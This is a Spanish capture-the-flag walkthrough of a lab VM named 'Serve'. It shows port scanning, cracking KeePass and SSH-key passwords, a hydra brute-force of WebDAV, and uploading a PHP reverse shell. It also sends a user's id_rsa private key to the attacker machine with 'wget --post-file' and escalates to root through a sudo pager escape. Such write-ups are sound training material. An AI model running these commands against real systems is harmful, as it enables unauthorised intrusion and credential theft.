Serve - Walkthrough

Introducción

Fase de reconocimiento

Lanzamos un escaneo ARP dentro de la red para identificar su dirección IP. En este caso al ser una máquina Linux virtualizada en VMware se ve claro por el OUI de la MAC que tiene la dirección IP 192.168.1.41 asignada.

❯ sudo arp-scan -I eth0 --localnet

Interface: eth0, type: EN10MB, MAC: 00:0c:29:43:e0:86, IPv4: 192.168.1.46
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.41    00:0c:29:64:dd:81       VMware, Inc.
```

Escaneamos los puertos de la máquina víctima y encontramos que tanto el puerto 22 (SSH) como el 80 (HTTP) están abiertos.

❯ nmap -p- -Pn -vvv -n -T5 192.168.1.41

Scanning 192.168.1.41 [65535 ports]
Discovered open port 80/tcp on 192.168.1.41
Discovered open port 22/tcp on 192.168.1.41
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

Nmap done: 1 IP address (1 host up) scanned in 3.60 seconds

Enumeramos los servicios de los puertos abiertos en busca de versiones e información adicional.

❯ nmap -p22,80 -sCV 192.168.1.41

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 9a:0c:75:5a:bb:bb:06:a2:9a:7d:be:91:ca:45:45:e4 (RSA)
|   256 07:7d:e7:0f:0b:5e:5a:90:e9:33:72:68:49:3b:f5:8c (ECDSA)
|_  256 6c:15:32:a7:42:e7:9f:da:63:66:7d:3a:be:fb:bf:14 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:64:DD:81 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 6.74 seconds

Ahora con la herramienta whatweb realizaremos una enumeración de las tecnologías web. No se encuentra nada interesante.

❯ whatweb http://192.168.1.41

http://192.168.1.41 [200 OK] Apache[2.4.38], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], IP[192.168.1.41], Title[Apache2 Debian Default Page: It works]

Fase de explotación

Empezaremos realizando una búsqueda de directorios y archivos potencialmente sospechosos en busca de alguna fuga de información. Encontramos dos directorios llamados webdav y secrets más un fichero de texto plano llamado notes.txt.

❯ gobuster dir -u http://192.168.1.41 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -b 403,404 -t 100 -x .php,.html,.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.41
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 10701]
/javascript           (Status: 301) [Size: 317] [--> http://192.168.1.41/javascript/]
/notes.txt            (Status: 200) [Size: 173]
/secrets              (Status: 301) [Size: 314] [--> http://192.168.1.41/secrets/]
/webdav               (Status: 401) [Size: 459]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================

Accedemos al directorio web webdav y nos encontramos con una autenticación HTTP básica. Al no tener unas credenciales válidas poco podemos hacer.

Revisamos el contenido del archivo notes.txt. Por el mensaje, es probable que exista algún tipo de base de datos que guarde credenciales en el directorio secrets.

❯ curl -s http://192.168.1.41/notes.txt
Hi teo,

the database with your credentials to access the resource are in the secret directory

(Don't forget to change X to your employee number)



regards

IT department

Realizaremos una búsqueda de archivos con extensiones SQL o KDBX dentro del directorio secrets. Estas extensiones suelen ser las mas comunes en cuanto a bases de datos. Encontramos un archivo con extensión KeePass.

❯ gobuster dir -u http://192.168.1.41/secrets -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -b 403,404 -t 100 -x .sql,.kdbx     
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.41/secrets
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              sql,kdbx
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/db.kdbx              (Status: 200) [Size: 2078]
Progress: 661680 / 661683 (100.00%)
===============================================================
Finished
===============================================================

Para confirmar de que tipo de archivo se trata, lo descargamos y con la herramienta file confirmamos que se trata de KeePass.

❯ file db.kdbx 
db.kdbx: Keepass password database 2.x **KDBX**

En este punto nos encontramos que no tenemos la contraseña maestra para poder abrir la base de datos KeePass por lo que no podremos acceder.

Existe una utilizad llamada keepass2john que viene junto a la herramienta john, donde es posible sacar el hash de la contraseña maestra de una base de datos kdbx y volcarlo en un archivo de texto plano.

❯ keepass2john db.kdbx > kpdb.txt

Con john ya podemos probar de romper el hash mediante el diccionario rockyou.txt (no se publica la contraseña encontrada).

❯ john --wordlist=/usr/share/wordlists/rockyou.txt kpdb.txt
d*****           (db)
Session completed.

Con el cliente KeePassXC se procede a abrir la base de datos kdbx encontrada. El cliente se instala con el siguiente comando.

❯ sudo apt install keepassxc

Introducimos la contraseña encontrada para acceder.

Encontramos las credenciales del usuario admin que según el mensaje del archivo notes.txt son las credenciales para acceder al recurso webdav.

El mensaje del archivo notes.txt también incluía lo siguiente.

(Don't forget to change X to your employee number)

Esto hace entender que hay que sustituir las X por números. Crearemos un diccionario que incluya en un archivo todos los números de 000 a 999. Para ello creamos un script en python que nos automatice esta acción y vaya volcando todo en un archivo llamado diccionario.txt.

# Creación del diccionario
diccionario = {}

# Bucle para generar los números del 000 al 999
for i in range(1000):
    # Formatear el número a un string de tres dígitos
    numero = '{:03d}'.format(i)
    # Concatenar el número con la palabra 'w3bd4v'
    clave = 'w3bd4v' + numero
    # Agregar la clave al diccionario
    diccionario[clave] = None

# Nombre del archivo
nombre_archivo = "diccionario.txt"

# Abrir el archivo en modo de escritura
with open(nombre_archivo, "w") as archivo:
    # Iterar sobre las claves del diccionario y escribirlas en el archivo
    for clave in diccionario.keys():
        archivo.write(clave + "\n")

print(f"El diccionario se ha guardado en el archivo '{nombre_archivo}'.")

Ejecutamos el script y tenemos el diccionario de 1000 lineas donde se incluyen todos los números del 000 al 999.

Con el diccionario hecho, procederemos a realizar fuerza bruta contra el directorio webdav. Para ello utilizaremos hydra (no se publica la contraseña encontrada).

❯ hydra -l admin -P diccionario.txt -f 192.168.1.41 http-get /webdav

[DATA] attacking http-get://192.168.1.41:80/webdav
[80][http-get] host: 192.168.1.41   login: admin   password: w3bd4vXXX
[STATUS] attack finished for 192.168.1.41 (valid pair found)
1 of 1 target successfully completed, 1 valid password found

Accedemos al recurso web y realizamos el login con las credenciales.

Teniendo acceso al directorio, probamos de subir un archivo de prueba y saber si sería posible subir una reverse shell para entablar una conexión.

Creamos el archivo prueba.txt y con la herramienta curl podemos hacer uso de la opción -T para hacer la subida del archivo. Añadimos las credenciales mediante el parámetro -u ya que el recurso esta protegido por autenticación HTTP básica. El recurso ha sido creado, buena señal.

❯ curl -u admin:w3bd4vXXX -T prueba.txt --digest http://192.168.1.41/webdav/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>201 Created</title>
</head><body>
<h1>Created</h1>
<p>Resource /webdav/prueba.txt has been created.</p>
<hr />
<address>Apache/2.4.38 (Debian) Server at 192.168.1.41 Port 80</address>
</body></html>

Procedemos a copiar una reverse shell que viene por defecto en Kali para su modificación y posterior subida. En este caso se modificará el nombre de la reverse shell a shell.php.

❯ cp /usr/share/webshells/php/php-reverse-shell.php .

Modificamos los campos IP (dirección IP Kali) y port.

Abrimos el puerto 4444 con netcat.

❯ nc -nlvp 4444

Subimos al recurso webdav la reverse shell PHP modificada.

❯ curl -u admin:w3bd4vXXX -T shell.php --digest http://192.168.1.41/webdav/ 
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>201 Created</title>
</head><body>
<h1>Created</h1>
<p>Resource /webdav/shell.php has been created.</p>
<hr />
<address>Apache/2.4.38 (Debian) Server at 192.168.1.41 Port 80</address>
</body></html>

Accedemos vía navegador al recurso webdav y abrimos al archivo shell.php para que se ejecute el fichero PHP y recibir la reverse shell.

Una vez ganado el acceso, realizamos el tratamiento de la tty.

script /dev/null -c bash
CTRL + Z
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 43 columns 189

Para conocer el tamaño de las filas y columnas, puedes ejecutar el siguiente comando en un terminal básico de tu máquina Kali.

stty size

En la primera fase de reconocimiento, parece que el usuario www-data tiene permisos para ejecutar el comando wget como el usuario teo sin necesidad de proporcionar una contraseña, interesante.

$ sudo -l
Matching Defaults entries for www-data on Serve:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on Serve:
    (teo) NOPASSWD: /usr/bin/wget

En wget existen unos parámetros llamados --post-data y --post-file los cuales con el primero es posible enviar una cadena de texto y el segundo un archivo mediante una petición wget.

Abrimos el puerto 2323 de nuestra máquina para recibir los datos enviados mediante el parámetro --post-data de wget.

❯ nc -nlvp 2323

Realizamos una prueba enviando una cadena de texto a través de una petición POST con wget.

www-data@serve:/$ sudo -u teo /usr/bin/wget --post-data=estoesunaprueba 192.168.1.50:2323
</wget --post-data=estoesunaprueba 192.168.1.50:2323
--2024-03-17 22:16:32--  http://192.168.1.50:2323/
Connecting to 192.168.1.50:2323... connected.
HTTP request sent, awaiting response...

Recibimos correctamente la petición POST con la cadena de texto.

❯ nc -nlvp 2323
listening on [any] 2323 ...
connect to [192.168.1.50] from (UNKNOWN) [192.168.1.41] 47576
POST / HTTP/1.1
User-Agent: Wget/1.20.1 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 192.168.1.50:2323
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

estoesunaprueba

Viendo que el servicio SSH esta abierto y existe un usuario llamado teo, trataremos de obtener la clave privada id_rsa del usuario. Utilizamos el parámetro --post-file para pasar el contenido del fichero mediante una petición POST a nuestra máquina Kali.

www-data@serve:/$ sudo -u teo /usr/bin/wget --post-file=/home/teo/.ssh/id_rsa 192.168.1.50:2323
<--post-file=/home/teo/.ssh/id_rsa 192.168.1.50:2323
--2024-03-17 22:34:10--  http://192.168.1.50:2323/
Connecting to 192.168.1.50:2323... connected.
HTTP request sent, awaiting response...

Recibimos la petición POST con la clave privada.

Antes de probar una conexión con la llave privada se recomienda modificar los permisos del archivo id_rsa. Para ello ejecutar chmod 400 id_rsa para que solo pueda ser leído por el propietario y no por grupos ni otros.

Probamos la conexión pero al no tener la passphrase.

❯ ssh -i id_rsa [email protected]
Enter passphrase for key 'id_rsa':

Con la herramienta ssh2john podemos generar un hash de la clave privada id_rsa.

❯ ssh2john id_rsa > idrsa.hash

Con john romperemos el hash y sacamos la contraseña de la clave privada del usuario teo.

❯ john idrsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
p******         (id_rsa)
Session completed.

Accedemos vía SSH.

❯ ssh -i id_rsa [email protected]
Enter passphrase for key 'id_rsa': 
Linux serve 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64
teo@serve:~$

Escalada de privilegios

Listamos que tipo de ejecuciones puede lanzar el usuario teo con privilegios de sudo. Es curioso que pueda ejecutar algo llamado bro como root.

teo@serve:~$ sudo -l
Matching Defaults entries for teo on Serve:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User teo may run the following commands on Serve:
    (root) NOPASSWD: /usr/local/bin/bro

Obtenemos mas información acerca de que tipo de archivo se trata. Nos encontramos ante un script programado en Ruby.

teo@serve:~$ file /usr/local/bin/bro
/usr/local/bin/bro: Ruby script, ASCII text executable

Este script en Ruby es un archivo ejecutable que se utiliza para correr una aplicación llamada bropages, la cual probablemente proporciona una interfaz para acceder a las páginas de manual (man pages) de forma más amigable o interactiva.

Ejecutamos el script sin pasarle ningún tipo de parámetro.

teo@serve:~$ sudo /usr/local/bin/bro
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::NIL is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::Data is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::TRUE is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::FALSE is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::Fixnum is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::Bignum is deprecated
Bro! Specify a command first!

        * For example try bro curl

        * Use bro help for more info

Ejecutamos el script pasandole como parámeto la herramienta curl.

teo@serve:~$ sudo /usr/local/bin/bro curl
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::NIL is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::Data is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::TRUE is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::FALSE is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::Fixnum is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::Bignum is deprecated
30 entries for curl -- submit your own example with "bro add curl"

# get the contents of a web page
curl http://bropages.org

        bro thanks      to upvote (133)
        bro ...no       to downvote (7)

........................................................................................................................................................................................

# download a file and write it to another file called myfile.html
curl -o myfile.html http://bropages.org

        bro thanks 2    to upvote (66)
        bro ...no 2     to downvote (0)

........................................................................................................................................................................................

# Download a file using its original filename, follow all redirects, and continue where you left off if the download previously failed
curl -LOC - http://foo.bar/file.ext

        bro thanks 3    to upvote (56)
        bro ...no 3     to downvote (0)

........................................................................................................................................................................................

# Get my external IP address 
curl ifconfig.me/ip

# Get my remote host
curl ifconfig.me/host

# Get my user agent
curl ifconfig.me/ua

# Get port
curl ifconfig.me/port

        bro thanks 4    to upvote (35)
        bro ...no 4     to downvote (3)

........................................................................................................................................................................................

Nos damos cuenta que el script nos muestra una especie de shell o algo por el estilo parecido a vim.

Ejecutamos una bash dada su ruta absoluta y al ser un script ejecutado con permisos de sudo, nos dará una bash root.

!/bin/bash
root@serve:/home/teo#

Encontramos las 2 flags tanto del usuario teo como de root.

root@serve:/home/teo# ls -l
total 4
-rwx------ 1 teo teo 33 abr 19  2023 user.txt
root@serve:/home/teo# cat user.txt
28bf16070abffab749a16bd11f635474
root@serve:/home/teo# cat /root/root.txt
981f4425d4ffcb3fb2fe145463b1d476
root@serve:/home/teo#

Última actualización hace 1 año